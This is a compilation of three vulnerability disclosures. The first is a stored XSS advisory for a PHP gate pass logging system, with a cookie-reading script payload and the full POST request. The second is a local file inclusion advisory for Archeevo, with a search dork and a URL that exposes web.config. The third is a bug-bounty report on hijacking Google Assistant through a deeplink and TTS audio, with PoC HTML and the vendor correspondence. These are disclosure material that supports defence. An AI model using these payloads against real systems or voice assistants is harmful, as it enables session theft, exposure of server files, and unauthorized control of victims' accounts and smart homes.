<pre><code># Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)<br /># Date: 10.11.2021<br /># Exploit Author: İlhami Selamet<br /># Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code<br /># Version: v1.0<br /># Tested on: Kali Linux + XAMPP v8.0.12<br /><br />Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.<br /><br />Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department<br />Step 1 - Click on the 'Create New' button for adding a new department.<br />Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script><br />Step 3 - Save the department.<br /><br />The stored XSS triggers for all users that navigate to the 'Department List' page.<br /><br />PoC<br /><br />POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888<br />Content-Length: 555<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department<br />Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54<br /><br />-----------------------------407760789114464123714007564888<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------407760789114464123714007564888<br />Content-Disposition: form-data; name="name"<br /><br /><script>alert(document.cookie);</script><br />-----------------------------407760789114464123714007564888<br />Content-Disposition: form-data; name="description"<br /><br />desc<br />-----------------------------407760789114464123714007564888<br />Content-Disposition: form-data; name="status"<br /><br />1<br />-----------------------------407760789114464123714007564888--<br /></code></pre>
<pre><code># Exploit Title: Archeevo 5.0 - Local File Inclusion<br /># Google Dork: intitle:"archeevo"<br /># Date: 01/15/2021<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: https://www.keep.pt/<br /># Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/<br /># Version: < 5.0<br /># Tested on: windows<br /><br /># 1. Description<br /><br />Unauthenticated user can exploit LFI vulnerability in file parameter.<br /><br /><br /># 2. Proof of Concept (PoC)<br /><br />Access a page that don’t exist like /test.aspx and then you will be redirected to<br />https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html<br /><br />After that change the file /FileNotFoundPage.html to /web.config and you be able to see the<br />/web.config file of the application.<br /><br />https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config<br /><br /><br /># 3. Research:<br />https://miguelsantareno.github.io/MoD_1.pdf<br /><br /></code></pre>
<pre><code>#0011<br />Vendor: Google<br />Status: fixed<br />Reported: Nov 25, 2019<br />Disclosed: Oct 10, 2021 (685 days)<br />Auth Bypass in Google Assistant<br /><br />Summary: Webpage can execute Google Assistant commands without any permissions<br /><br />Steps to reproduce:<br /><br /> Generate the TTS audio files using the Google Cloud TTS API, using the text commands in the JavaScript comments<br /> Make sure the device is not muted, or have headphones connected<br /> Open the POC HTML on an Android device with Google Assistant<br /> Click one of the POC attacks<br /> See the Google Assistant commands execute automatically, without any permissions<br /><br />This attack works by first triggering Google Assistant using a deeplink (acquired from the mobile “google.com” page, where there is a button to trigger the Assistant) and after a bit of delay, playing TTS generated commands as plain audio.<br /><br />This attack can be exploited the same way (or sending a “VOICE_COMMAND” intent) by Android applications (without any permissions required), actually that was my first idea, but I figured that the impact is way higher if a victim only has to visit a webpage to get the same results.<br /><br />One weird thing I noticed while testing using the Chrome browser on Android, is that an audio file is played differently depending on the length. This forced me to split the attacking commands into different audio files (for example the “share location” and the phone number are different commands), since when I tried to play the longer audio file, Chrome interpreted it as a “media”, and displayed the media control notification as well. And triggering Assistant while a longer audio “media” was playing, caused Assistant to pause the audio. When using shorter audio files, the media control notification did not appear, and Assistant didn’t pause the media, allowing it to execute the malicious commands.<br /><br />I used the Cloud Text-to-Speech API to generate the audio files. I used language_code=’en-US’ and name=”en-US-Wavenet-A” to generate the audio files. All of the text input used to generate the audio files can be found in the JavaScript comments.<br /><br />I attached 2 POC videos to make it easier to see the attack running:<br /><br />Single command POC Video: https://youtu.be/T3CgECvV-qM<br /><br />Multiple command / Confirmation POC Video: [redacted]<br /><br />— POC HTML —<br /><br /><html><br /><br /><body><br /> <br /> <h1><br /> <a onclick="share()" href="googleapp://deeplink/?data=CkwBDb3mGzBFAiEAic8-0un3nRrMa_hkMUV9fj_zD09xhu9D6xTXEsFSRPICIEJlWlJRSqv3afrbX9J8BZa_h3sAfF8NSDFAlLSj10MUEjkKAggAEgIIbxoQEg4IBBIK6oqo9AQECAFAACIdChtodHRwOi8vYXNzaXN0YW50Lmdvb2dsZS5jb20"><br /> share location</a><br /> </h1><br /> <br /> <h1><br /> <a onclick="opendoor()" href="googleapp://deeplink/?data=CkwBDb3mGzBFAiEAic8-0un3nRrMa_hkMUV9fj_zD09xhu9D6xTXEsFSRPICIEJlWlJRSqv3afrbX9J8BZa_h3sAfF8NSDFAlLSj10MUEjkKAggAEgIIbxoQEg4IBBIK6oqo9AQECAFAACIdChtodHRwOi8vYXNzaXN0YW50Lmdvb2dsZS5jb20">open<br /> front door</a><br /> </h1><br /><br /> <script><br /> // language_code='en-US'<br /> // name="en-US-Wavenet-A"<br /><br /> function share() {<br /> setTimeout(function() {<br /><br /> var audio = new Audio('share1.mp3'); // "share my location with"<br /> audio.play();<br /><br /> setTimeout(function() {<br /><br /> var audio = new Audio('share2.mp3'); // "[redacted]" [PHONE NUMBER TO SEND SMS TO]<br /> audio.play();<br /><br /> setTimeout(function() {<br /> var audio = new Audio('confirm.mp3'); // "send it"<br /> audio.play();<br /> }, 12000);<br /><br /> }, 6000);<br /><br /> }, 500);<br /> }<br /><br /> function opendoor() {<br /> setTimeout(function() {<br /><br /> var audio = new Audio('open.mp3'); // "open the front door"<br /> audio.play();<br /><br /> }, 500);<br /> }<br /> </script><br /><br /></body><br /><br /></html><br /><br />— END POC HTML —<br /><br />Attack scenario: This attack allows an attacker to execute malicious commands in Google Assistant, on behalf of the victim, just by making the victim visit a webpage. The Assistant has access to extremely sensitive information, and may be able to control the victim’s Google Account, Smart Home, and other IOT appliances. An attacker should never be able to execute commands in Google Assistant, without having sufficient permissions.<br /><br />Limitation of this attack:<br /><br /> The phone must not be muted or have headphones connected, since Google Assistant wouldn’t hear the malicious audio<br /> The malicious commands could be heard by the user, since they are playing out loud<br /> The attack will fail if the user closes the Assistant mid-attack<br /><br />Why I checked “Is this vulnerability public or known to third parties?”: I found out about this issue (only the idea of playing the commands as audio, using the phone) by browsing forums where people were talking about finding ways to execute Assistant commands to automate their different workflows. This method was posted publicly as an “Automate” (Android automating app) “flow” to execute an Assistant command. Their motivations wasn’t malicious, but I realized that this method could be abused by an attacker, and made it into a POC. Therefore, I mark this vulnerability as public, since anyone can find this information and use it for malicious purposes.<br />Comments:<br /><br />Vendor - 2019-11-25 10:17<br /><br />** NOTE: This e-mail has been generated automatically. **<br /><br />Thanks for your report.<br /><br />This email confirms we’ve received your message. We’ll investigate and get back to you once we’ve got an update. In the meantime, you might want to take a look at the list of frequently asked questions about Google VRP at https://sites.google.com/site/bughunteruniversity/behind-the-scenes/faq.<br /><br />If you are reporting a security vulnerability and wish to appear in Google Security Hall of Fame, please create a profile at https://bughunter.withgoogle.com/new_profile.<br /><br />You appear automatically in our Honorable Mentions if we decide to file a security vulnerability based on your report, and you will also show up in our Hall of Fame if we issue a reward.<br /><br />Note that if you did not report a vulnerability, or a technical security problem in one of our products, we won’t be able to act on your report. This channel is not the right one if you wish to resolve a problem with your account, report non-security bugs, or suggest a new feature in our product.<br /><br />Cheers, Google Security Bot<br /><br />Follow us on Twitter! https://twitter.com/googlevrp<br /><br />Me - 2019-11-25 10:26<br /><br />One possible fix for this could be to disable any playing audio on the device when the Assistant is listening for commands.<br /><br />Vendor - 2019-11-25 13:29<br /><br />** NOTE: This e-mail has been generated automatically. **<br /><br />Hey,<br /><br />Just letting you know that your report was triaged and we’re currently looking into it.<br /><br />You should receive a response in a couple of days, but it might take up to a week if we’re particularly busy. In the meantime, you might want to take a look at the list of frequently asked questions about Google VRP at https://sites.google.com/site/bughunteruniversity/behind-the-scenes/faq.<br /><br />Thanks, Google Security Bot<br /><br />Me - 2019-11-26 16:52<br /><br />One more thing to add is that if a Android application is using the same method to issue malicious Assistant commands, it could bypass one or more of the above mentioned limitations that a website is unable to:<br /><br /> The muted phone, by playing the audio as an alarm so it plays even when the phone is set to silent<br /> The need for not having any headphones plugged in / connected, by playing the audio as an alarm, because in my limited research that seems to play on both the headphones and on the speaker, or by routing the audio using the setSpeakerphoneOn(true) method.<br /><br />These should not require any/dangerous permissions.<br /><br />Thanks, David<br /><br />Vendor - 2019-12-02 16:28<br /><br />Hi,<br /><br />Nice catch! I’ve filed a bug based on your report.<br /><br />All you need to do now is wait. If you don’t hear back from us in 2-3 weeks or have additional information about the vulnerability, let us know!<br /><br />Regards,<br /><br />Google Trust and Safety<br /><br />Me - 2019-12-18 00:20<br /><br />** NOTE: This is an automatically generated email **<br /><br />Hello,<br /><br />Thank you for reporting this bug. As part of Google’s Vulnerability Reward Program, the panel has decided to issue a reward of $500.00.<br /><br />Important: if you aren’t registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to do it again - sit back and relax, and we will process the payment soon.<br /><br />If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from. Regards,<br /><br />Google Security Bot<br /><br />If you’d like your name added to our Hall of Fame:<br /><br />https://bughunter.withgoogle.com/<br /><br />Just create a profile here: https://bughunter.withgoogle.com/new_profile<br /><br />In addition, we encourage you to signup for our Vulnerability Research Grants program, where we issue monetary payments to VRP researchers, even when no vulnerabilities are found. To read more about the program visit: https://www.google.com/about/appsecurity/research-grants/<br /><br />– How did we do? Please fill out a short anonymous survey (https://goo.gl/IR3KRH).<br /><br />Vendor - 2020-01-07 16:41<br /><br />Hey David,<br /><br />We were reviewing past VRP reports for our end of the year review and it came to our attention that your report was not correctly assessed, when it was previously reviewed in our reward panel.<br /><br />I have sent your report back for a second review and you should be receiving an updated reward decision next week.<br /><br />Regards, [redacted], Google Trust & Safety<br /><br />Vendor - 2020-01-17 00:20<br /><br />** NOTE: This is an automatically generated email **<br /><br />Hello,<br /><br />Thank you for reporting this bug. As part of Google’s Vulnerability Reward Program, the panel has decided to issue a reward of $4500.00.<br /><br />Important: if you aren’t registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to do it again - sit back and relax, and we will process the payment soon.<br /><br />If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from. Regards,<br /><br />Google Security Bot<br /><br />If you’d like your name added to our Hall of Fame:<br /><br />https://bughunter.withgoogle.com/<br /><br />Just create a profile here: https://bughunter.withgoogle.com/new_profile<br /><br />In addition, we encourage you to signup for our Vulnerability Research Grants program, where we issue monetary payments to VRP researchers, even when no vulnerabilities are found. To read more about the program visit: https://www.google.com/about/appsecurity/research-grants/<br /><br />– How did we do? Please fill out a short anonymous survey (https://goo.gl/IR3KRH).<br /><br />Me - 2020-04-19 20:40<br /><br />Hi!<br /><br />I have plans around potentially disclosing this issue in a talk at a security conference in October 2020. I am writing this to ask about the status of this issue and to request permission to disclose this issue when it will become fully fixed.<br /><br />Would the disclosure time of October 2020 be possible?<br /><br />Thank you, David<br /><br />Vendor - 2020-04-30 16:07<br /><br />Hi David,<br /><br />Disclosure around October 2020 should be fine.<br /><br />Best of luck with preparing with your talk and if you would like us to review any of your presentation for feedback, please let us know!<br /><br />Regards, [redacted], Google Trust & Safety<br /><br />Vendor - 2020-12-11 11:09<br /><br />Hi David,<br /><br />Per our email discussion, sending you a note just as an FYI: We classified this report as an abuse risk.<br /><br />Best of luck in your future research,<br /><br />[redacted]<br /><br />Me - 2021-02-25 09:04<br /><br />Hi,<br /><br />Can I ask what the fix was here? My POC broke, looks like that link which triggered Assistant is now disabled. But, I can still play malicious audio to Assistant, if it was triggered manually.<br /><br />Is only the “programatic triggering” that was removed? If so, if I find any other way to auto-trigger Assistant, is that considered a new bug?<br /><br />Thank you, David<br /><br />Me - 2021-03-03 10:17<br /><br />Hi David,<br /><br />I’m not sure if I fully understand your question - so please let me know if I missed anything.<br /><br />In your initial report, you were able to execute Google Assistant commands automatically, without any user permissions. The root cause that led to this particular issue has been fixed now. Of course, if you are able to identify a different way to auto-trigger Assistant we would be really curious to hear about.<br /><br />Let me know if you have any other questions!<br /><br />Best, [redacted]<br /><br />Vendor - 2021-04-28 10:42<br /><br />The status of this report is being changed so that our automation will notify you when the underlying bug is fixed. There isn’t any action needed on your part here, just a book-keeping change. Apologies for the extra noise/email.<br /><br />Me - 2021-03-14 18:25<br /><br />Hi,<br /><br />Good news (for me, at least), the deeplink is back! It looks to have some extra protection, and sometimes it’s glitching all over the place, but I was able to bypass it if the user has some music playing:<br /><br />https://youtu.be/phIgnbaGDHo<br /><br />Thank you, David<br /><br />Me - 2021-03-14 18:35<br /><br />Some extra info, if teams would be confused about the origin of this deeplink:<br /><br />This link is used on google.com, when visited with an (android?) User Agent. \<br /><br />When the bug got fixed initially, this button also became unusable (but it was still there), but few days ago I pressed it, and it was working again, hence I tried the POC. And now it works again, with the same exact deeplink the original POC had in 2019.<br /><br />I attached a picture of what it looks like.<br /><br />Vendor - 2021-03-18 13:17<br /><br />Hi David,<br /><br />Great job (as always) - thank you for pointing that out! I’ve reached out to the product team with all the info you’ve shared to make them aware of this.<br /><br />We will keep you posted as we learn more!<br /><br />Thanks! [redacted]<br /><br />Vendor - 2021-06-08 14:49<br /><br />Hi David,<br /><br />Was your latest test on an actual phone or an emulation? Can you provide us the phone model you used to test this?<br /><br />Me - 2021-06-08 19:05<br /><br />Hi,<br /><br />I used a real device, a Pixel 5 with the latest Google app.<br /><br />Thank you, David<br /><br />Vendor - 2021-06-08 19:58<br /><br />Thanks David.<br /><br />Me - 2021-07-11 07:47<br /><br />Hi,<br /><br />Is there any update on this issue? When is the fix expected?<br /><br />Thank you, David<br /><br />Vendor - 2021-07-13 08:59<br /><br />Hi David,<br /><br />I don’t have any updates on the timeline of the fix yet. Having said that, I can confirm that the team is working on the fix and that your report was sent to the VRP Panel. We had some difficulties to reproduce this issue but you should get an update on your reward later today.<br /><br />Best, [redacted]<br /><br />Vendor - 2021-07-13 15:20<br /><br />** NOTE: This is an automatically generated email **<br /><br />Hello,<br /><br />Regarding our Vulnerability Reward Program: The VRP panel has decided to issue a reward of $3133.70 for your report. Congratulations!<br /><br />Important: If you aren’t already registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to repeat the process – you can sit back and relax, and we will process the payment soon.<br /><br />Note: This month, we are changing our payment processing backend. There might be small delays (a few weeks) with how the payments are processed. Thanks for understanding, and sorry for the trouble!<br /><br />If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from.<br /><br />Regards,<br /><br />Google Security Bot<br /><br />P.S. Two other things we’d like to mention:<br /><br /> If you’d like us to add your name to our Hall of Fame at https://bughunter.withgoogle.com/rank/hof, please create a profile at https://bughunter.withgoogle.com/new_profile if you haven’t already done so.<br /> We encourage you to sign up for our Vulnerability Research Grants program at https://www.google.com/about/appsecurity/research-grants/, where we issue monetary payments to VRP researchers, even when no vulnerabilities are found.<br /><br />– How did we do? Please fill out a short anonymous survey (https://goo.gl/IR3KRH).<br /><br />Me - 2021-08-11 13:07<br /><br />Hi,<br /><br />It looks like to me that if the Assistant is opened with deeplink, it requires a manual press on the mic icon to start listening. This seems to fix the issue.<br /><br />Can you please confirm this? Did the product team implement this as a fix?<br /><br />[Disclosure Warning!]<br />I plan to disclose this bug at a security conference in October, and in an internal company-wide talk on Friday.<br /><br />Please let me know if I should delay disclosure.<br /><br />Thank you,<br />David<br /><br />Me - 2021-08-13 07:36<br /><br />[redacted] confirmed that the product team has indeed pushed a fix. I’ll disclose the issue today.<br /><br />Vendor - 2021-08-08 16:19<br /><br />Thanks for letting us know David :)<br /><br /></code></pre>